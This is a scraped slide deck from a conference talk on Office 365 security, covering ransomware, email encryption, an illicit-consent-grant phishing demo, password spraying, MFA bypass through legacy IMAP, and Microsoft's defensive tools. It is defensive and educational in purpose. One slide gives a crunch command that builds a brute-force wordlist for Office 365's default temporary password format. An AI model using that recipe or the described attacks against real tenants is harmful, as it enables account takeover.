Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Office365 from a hacker's perspective: Real-life Threats, Tactics and Remedies


Published on

Office 365 environments are very attractive targets for attackers. So, it's never been more important to understand how its security structure works, and how to best configure it.

In this in-depth session, we'll run through real-time attack scenarios and examine common attack vectors. And then we'll explore the various defense capabilities of Office 365, the MS Graph API, and Azure AD. We'll deep-dive into external sharing, authentication options, third-party application security (what apps should and shouldn't be able to do), and even some do's and don'ts regarding Azure AD endpoints and authorization mechanisms.

You'll walk away with a solid understanding of how to use the Office 365 defense tools at your disposal, such as the Attack Simulator and Threat Intelligence, as well as how they relate to real-world attacks.

Published in: Software
  • Be the first to comment

  • Be the first to like this

Office365 from a hacker's perspective: Real-life Threats, Tactics and Remedies

  1. 1. Office365 from a Hacker’s perspective Real life threats, tactics and remedies Twitter: @BenMenesi
  2. 2. Speaker  Head of Products at Ytria  Started out in the IBM world (Admin & Developer)  SharePoint & Exchange Admin and Developer  Certified Ethical Hacker v9 and current OSCP student  Enjoys breaking things  Speaker at IT events around the globe on all things collaboration and security (SPS Toronto, Calgary, Geneva, Cambridge, Chicago etc…) Ben Menesi @BenMenesi Twitter: @BenMenesi
  3. 3. Ytria  Founded in ‘99 in Montreal, Canada  Started in the IBM Software World  500+ customers, 3k orgs, 165 countries  Sapio365 GA Summer of 2018 Who we are Twitter: @BenMenesi
  4. 4. Ytria  Locally installed Administration Client for O365: Users, Groups, Teams, OneDrive & more  PowerShell-less reporting, bulk updates, unparalleled security monitoring.  Free for <50 users, 3 month key for anyone at Omaha SP UG: What we do: sapio365 Twitter: @BenMenesi
  5. 5. Agenda What we’ll cover today Ransomware Attacks Email security Multi-Factor Authentication Illicit Consent Grants Twitter: @BenMenesi
  6. 6. Statistics Some numbers from the field  Verizon’s 2017 & 2018 Data Breach Investigations Report: breach-investigations-report/: 53000 incidents & 2216 data breaches 58% Victims are businesses with < 1000 employees (62% in 2017) 92% 68% Breaches took months(!!!) to discover Twitter: @BenMenesi Malware vectors: Email. (6.3% Web, 1.3% other)
  7. 7. On-Prem. vs. Cloud security Benefits of your data in the cloud Broader scope of threat intelligence Larger and more specialized security muscle than most SMBs Fast and instant delivery (no manual patching required) Twitter: @BenMenesi
  8. 8. On-Prem. vs. Cloud security Disadvantages of using cloud services Vulnerability mitigation out of your control Your organization is part of a larger attack surface Less wiggle-room to tailor defenses to your needs Twitter: @BenMenesi
  9. 9. Ransomware  Basestriker attack: gets around Microsoft’s ATP SafeLinks by leveraging the <base> URL tag. Practical example Twitter: @BenMenesi  Traditional way to embed URLs in a phishing email:  Using the <base> tag:
  10. 10. Ransomware Attack Timeline 02.05.2018 Microsoft alerted by Avanan 02.05.2018 Proofpoint alerted by Avanan 16.05.2018 Microsoft fixes vulnerability 14 days Twitter: @BenMenesi
  11. 11. Ransomware A more recent attack: MFA bypass via IMAP  credential-dumps-phishing-and-legacy-email-protocols  Highlights (details discussed later)  100,000 unauthorised login attempts analyzed (December 2018 – onwards)  72% tenants were targeted at least once  40% tenants had at least 1 compromised account  15 of 10,000 active user accounts breached
  12. 12. Ransomware Twitter: @BenMenesi
  13. 13. Ransomware attacks  DOJ Statistics: 1000 attacks / day in 2015, 4000 attacks / day in 2017  WannaCry: 150 countries, estimated at $4B  NotPetya: $250-300M for Maersk alone, $1.2B in total revenue  54% of companies experienced one or more successful attacks  Total cost of a successful cyber attack is over $5M or $301 / employee Why are they so important? Twitter: @BenMenesi
  14. 14. How do they spread? Ransomware Protection  60% of ransomware attacks come from infected emails BUT:  Also, vulnerable (application) servers  Example: city of Atlanta hit by SamSam (originally discovered in 2016) in 2018  Malware infection likely through SMBv1 open on a web server  Aftermath: $2.6M cost  Conclusion: Update, patch, pay attention to cyber hygiene! Twitter: @BenMenesi
  15. 15.  Cautionary tale: Herrington & Company gets ransomwared  Engages Data Recovery company to retrieve data  DR company quotes $6000 to recover data  Data recovery is WAY too fast  FBI confirms that PDR indeed paid ransom to decrypt victim’s files   How do we prevent ransomware? Decrypting Ransomware Ransomware Protection Twitter: @BenMenesi
  16. 16.  Microsoft introduced Files Restore OneDrive  Allows to restore entire OneDrive account to a previous point in time within 30 days  Monitors file assets notifies if an attack is detected Office365 Ransomware Protection Ransomware Protection Twitter: @BenMenesi
  17. 17.  Careful!  Real time notification might not be as accurate as we think  AXCrypt encryption on OneDrive flies easily under the radar.  Ransomware prevention: have users store important data in OneDrive Office365 Ransomware Protection Ransomware Protection Twitter: @BenMenesi
  18. 18. Email & Sharing Twitter: @BenMenesi
  19. 19.  Email Encryption: End-to end encryption  Prevent Forwarding: Restrict email recipients from forwarding or copying emails you send (plus: MS Office docs. Attached are encrypted even after downloading)  What happens if the recipient is outside your organization: New(ish) advanced email protection options Email encryption Twitter: @BenMenesi
  20. 20. OME: Automatically enabled Email encryption Twitter: @BenMenesi
  21. 21.  OME Viewer App. – Now deprecated  iOS mail app didn’t support decrypting messages protected by OME.  Rights restrictions become void (even though if using an Office365 mail server, forwarding such a mail is still not allowed)  To toggle this: Set-ActiveSyncOrganizationSettings –AllowRMSSupportForUnenlightenedApps <$true|$false>  Note: previously encrypted messages won’t be viewable on IOS  Review what’s new in OME: us/office365/securitycompliance/set-up-new-message-encryption-capabilities  Tip: customize your OME message look and feel: us/article/add-your-organizations-brand-to-your-encrypted-messages- 7a29260d-2959-42aa-8916-feceff6ee51d New advanced email protection options Email encryption Twitter: @BenMenesi
  22. 22.  This one is thanks to Al Hoitingh: message-revocation/  Encrypted status means: email & content didn’t leave the perimeter.  You can use Message Trace to locate the outgoing mail and then use powershell to:  Query the OME status: Get-OMEMessageStatus -MessageID “message id”  Set message as revoked: Set-OMEMessageRevocation -Revoke $true - MessageID “message id” Revoking Encrypted Messages Email encryption Twitter: @BenMenesi
  23. 23. Revoking Encrypted Messages Email encryption Twitter: @BenMenesi Because the data never left perimeter, it’s the ‘link’ that’s broken at the moment of revocation and recipient will get this:
  24. 24. Illicit Consent Grants Twitter: @BenMenesi
  25. 25. Azure AD applications  In the light of the Facebook Cambridge Analytica scandal, we should take a look at Azure AD registered applications  Phishing campaigns could trick users into granting access to applications  against-illicit-consent-grants/  Exploit first demonstrated by Kevin Mitnick Illicit Consent Grants Twitter: @BenMenesi
  26. 26. Azure AD applications  Demo  Infrastructure: Exploit Scenario Twitter: @BenMenesi User Apache Web Server Hacker
  27. 27. Azure AD applications  Infrastructure – bit more detail (Thanks to Albert Hoitingh) Exploit Scenario
  28. 28. Azure AD applications  Let’s see this live! Exploit Scenario
  29. 29. Azure AD applications  User receives a legit looking email: Exploit Scenario Twitter: @BenMenesi
  30. 30. Azure AD applications  Picks account to authenticate Exploit Scenario Twitter: @BenMenesi
  31. 31. Azure AD applications  Presented with permissions that need consent (and they make sense) Exploit Scenario Twitter: @BenMenesi
  32. 32. Azure AD applications  All mails encrypted  … and this is just one of many outcome possibilities Exploit Scenario Twitter: @BenMenesi
  33. 33. Azure AD applications  Why build integrated applications?  Using various APIs, you can grant apps access to your tenant data:  Mail, calendars, contacts, conversations  Users, groups, files and folders  SharePoint sites, lists, list items  OneDrive items, permissions and more  Integration: Azure AD provides secure sign-in and authorization  Developer registers the application with Azure AD  Assign permissions to the application  Tenant administrator / user must consent to permissions Introduction – Digital #metoo era: Consent is key! Twitter: @BenMenesi
  34. 34. Azure AD applications  Who can register applications in your tenant?  By default: any member! This can be a security issue  Keep in mind: there is a record of what data was shared with which application. Also: when user adds / allows application to access their data, event can be audited (Audit reports)  See more: directory/develop/active-directory-how-applications-are-added#who- has-permission-to-add-applications-to-my-azure-ad-instance Registering the application Twitter: @BenMenesi
  35. 35. Azure AD applications  Endpoint v1: Azure AD Admin center ( > Enterprise Applications > New Application Azure AD Endpoints: Endpoint 1 Twitter: @BenMenesi
  36. 36. Azure AD applications  Endpoint v1 properties  Only supports 1 platform / application  Supports ALL APIs  Static permissions Azure AD Endpoints: Endpoint 1 Twitter: @BenMenesi
  37. 37. Azure AD applications  Endpoint v2 properties (  Supports multiple platforms  Only supports Graph API  Scopes vs. Resources (dynamic permissions)  Strategic new direction for Microsoft  Gotcha: v1 and v2 aren’t compatible! Azure AD Endpoints: Endpoint 2 Twitter: @BenMenesi
  38. 38. Azure AD applications  What you’ll need  Application Name Registering the application Twitter: @BenMenesi
  39. 39. Azure AD applications  What you’ll need  Application Name  Application password Registering the application Twitter: @BenMenesi
  40. 40. Azure AD applications  What you’ll need  Application Name  Application password  Platform  Redirect URL(s) Registering the application Twitter: @BenMenesi
  41. 41. Azure AD applications  What you’ll need  Application Name  Application password  Platform  Redirect URL(s)  Owner(s)  Permissions  Delegated  Application Registering the application Twitter: @BenMenesi
  42. 42. Azure AD applications  Azure AD v1. endpoint permissions (delegated only): 87  Azure AD v2. endpoint permissions  Delegated: 77  Application: 39 Permissions Twitter: @BenMenesi
  43. 43. Azure AD applications  Application will access and do stuff on your behalf: consent required  Two types of consent:  User can consent (limited scope actions, delegated permissions only)  Admin must consent (larger scope actions, some delegated, all application permissions) Consent Twitter: @BenMenesi
  44. 44. Azure AD applications  Oauth2 / OpenID Connect Authorization flow Twitter: @BenMenesi
  45. 45. Azure AD applications  How does it work?  User consents to permissions required by the app  Application asks for authorization from the Azure AD  Azure AD makes the user sign in and returns code to application  Application uses code to retrieve JWT bearer token to use resource (Microsoft Graph API)  Keep in mind: JWT doesn’t authenticate, only authorizes!  Hijacking the JWT token is extremely dangerous Authorization flow Twitter: @BenMenesi
  46. 46. Azure AD applications How do you prevent illicit consent grants Application Registration & consent restrictions Regular application & permission enumeration Cloud App Security Educate users Twitter: @BenMenesi
  47. 47. Azure AD applications  Azure Portal > Azure Active Directory > User settings Remedy: Restricting app registrations Twitter: @BenMenesi
  48. 48. Azure AD applications  Azure Portal > Azure Active Directory > User settings Remedy: Restricting consent grants Twitter: @BenMenesi
  49. 49. Azure AD applications  While we’re at it…  Simple users are by default allowed to access the Azure AD Administration portal allowing them to view:  All users’ group memberships  All users’ assigned licenses and enabled services  All users’ directory roles (find global administrator accounts)  Best to disable this: Azure Active Directory > User Settings > Administration Portal Remedy: Restricting consent & app registrations Twitter: @BenMenesi
  50. 50. Azure AD applications  Enumerating applications using PowerShell:  Install the AzureAD PowerShell module  Launch PowerShell ISE as an Administrator and: Install-Module AzureAD  Connect to Azure AD: Connect-AzureAD  Use PowerShell script:  Example: .Get-AzureADPSPermissions.ps1 | Export-Csv -Path "permissions.csv" - NoTypeInformation Remedy: Enumerating apps and permissions Twitter: @BenMenesi
  51. 51. Azure AD applications  What you get: Remedy: Enumerating apps and permissions Twitter: @BenMenesi
  52. 52. Azure AD applications  Gotcha: won’t show redirect URLs!  To get Apps and Redirect URLs: Get-AzureRmADApplication  Requires AzureRM.Resources and Connect-AzureRMADAccount: Remedy: Enumerating apps and permissions Twitter: @BenMenesi
  53. 53. Azure AD applications  Use “consent” string to filter: Remedy: Searching your Audit Logs Twitter: @BenMenesi
  54. 54. Azure AD applications  Create an OAUTH App Security Policy Remedy: Cloud App Security Twitter: @BenMenesi
  55. 55. Azure AD applications Remedy: Cloud App Security Twitter: @BenMenesi
  56. 56. Azure AD applications What you get with cloud app security from our scenario: Twitter: @BenMenesi
  57. 57. Password Attacks Twitter: @BenMenesi
  58. 58. Brute force attacks  In the news in August 2017: sophisticated and coordinated attack against 48 Office365 customers  Brute Force attack unique: targeting multiple cloud providers  100,000 failed login attempts from 67 Ips and 12 networks over 7 months  Slow and low to avoid intrusion detection  Users see unsuccessful login attempts using name up to 17 name variations  Passwords likely the same (password spray attack)  office-365-accounts/ Brute forcing office365 logins Twitter: @BenMenesi
  59. 59. Brute force attacks  Demo How hard is it to acquire the right login names? Twitter: @BenMenesi
  60. 60. Brute force attacks  Before this Tuesday (02/04/2019):  10 unsuccessful attempts: captcha  Another 10: lockout (10 mins)  In reality: 10 tries = lockout  No customization allowed Account Lockout in Office365 Twitter: @BenMenesi
  61. 61. Brute force attacks  As of Tuesday 02/04/2019 – WOOHOO!   Identity/Azure-AD-Password-Protection-is-now-generally-available/ba- p/377487#.XKYVYnSP8eU.twitter Account Lockout in Office365 Twitter: @BenMenesi
  62. 62. Authentication  Multi Factor Authentication  Focus: cloud only -> Azure Active Directory MFA  Grants access to users with a password / PIN / Security Token / Device / DNA information.  Free support for MFA on Office365 apps.  Interesting story: What could’ve stopped all this? MFA Twitter: @BenMenesi
  63. 63. Authentication MFA: true story  I’ll just put this here…  Thanks to @RachelTobac for this gem: Twitter: @BenMenesi
  64. 64. Authentication MFA – true story  Good news: management through the app is better Twitter: @BenMenesi
  65. 65. Authentication MFA – the elephant in the room  2 serious outages in 2018 alone. Twitter: @BenMenesi
  66. 66. Authentication MFA – in case of emergencies  Consider implementing a break glass account (via Exclusions from Baseline MFA policy): default-for-admins/  Azure AD Portal > Conditional Access Twitter: @BenMenesi
  67. 67. Authentication The way around MFA  Recent breaches discovered by Proofpoint  leverage-credential-dumps-phishing-and-legacy-email-protocols  Essentially: Using IMAP to get around MFA by mimicking legacy email clients Twitter: @BenMenesi
  68. 68. Authentication The way around MFA  Microsoft’s response: 365/enterprise/secure-email-recommended-policies  Require MFA  Block clients that don’t support modern auth.  App Passwords Twitter: @BenMenesi
  69. 69. Attack Simulation  Available as part of Threat Intelligence (available in Office365 Enterprise E5)  Follows logical penetration testing steps  You must be a global administrator or member of the Security Admin group in the Security & Compliance Center AND have MFA enabled on your account.  What does it allow you to do?  Requirements  Multi Factor Authentication must be enabled  Attack simulations must be set up The all new Office365 Attack Simulator Spear Phishing Campaigns Password Brute-Force Attacks Password Spray Attacks Twitter: @BenMenesi
  70. 70. Attack Simulation  Where to find it: / Threat Management The all new Office365 Attack Simulator Twitter: @BenMenesi
  71. 71. Attack Simulation  Only works for individual users (no groups for now)  Tip: target users identified as top targeted in the Threat Management dashboard  Tip2: You’ll need to enable Office Analytics Spear Phishing campaigns Twitter: @BenMenesi
  72. 72. Attack Simulation  User tries logs in to phishing site  Redirected to awareness page Spear Phishing campaigns Twitter: @BenMenesi
  73. 73. Attack Simulation  Tip: best to use your own phishing sites, google already flagged most of them. Spear Phishing campaigns Twitter: @BenMenesi
  74. 74. Attack Simulation  Use a pre-set word list against one or multiple user accounts  Uses the same method an attacker would  I mean literally: watch out! Currently this locks out the user account.  Only supports very limited password lists (Internal server error at 10k passwords)  Best online resources for common credentials: mon-Credentials Brute Force Password Twitter: @BenMenesi
  75. 75. Attack Simulation  Tries one or a few passwords against all accounts  Story: known password against two accounts  Both accounts DID have that password  Why?  Gotcha: second user had MFA enabled, which doesn’t appear to be supported. Password Spray Attack Twitter: @BenMenesi
  76. 76. Threat Tracker  Tracks major malware campaigns (WannaCry, Petya, etc)  Let’s you track the impact of these campaigns in your tenant Generally available in office365 – Security & Complicance Twitter: @BenMenesi
  77. 77. Office365 passwords  Current (4th April 2019) password format isn’t hard to guess:  Tip: make sure to have users modify their passwords on first login About generating random passwords Twitter: @BenMenesi
  78. 78. Office365 passwords  Always 8 characters  Starts with 3 letters  Ends in 5 numbers Guessing random passwords ConsonantConsonants 21 21 Vowel 5 Numbers 10 10 10 10 10 220,500,000 Twitter: @BenMenesi
  79. 79. Office365 passwords  Pretty easy to create a password list for brute-force:  Using crunch: crunch 8 8 aeiou BCDFGHJKLMNPQRSTVWXYZ 0123456789 bcdfghjklmnpqrstvwxyz –t ,@^%%%%%  File size: only ~ 1GB Guessing random passwords Twitter: @BenMenesi
  80. 80. Office365 passwords  Simulate attacks against your own environment  Keep an eye out for more attack simulation tools  Use your own phishing tactics and word lists  Educate users on strong passwords Conclusion Twitter: @BenMenesi
  81. 81. Check out sapio365 Twitter: @BenMenesi Download sapio365 (free for 3 months):
  82. 82. Thank you Questions & Feedback welcome Let’s connect! ( @BenMenesi Twitter: @BenMenesi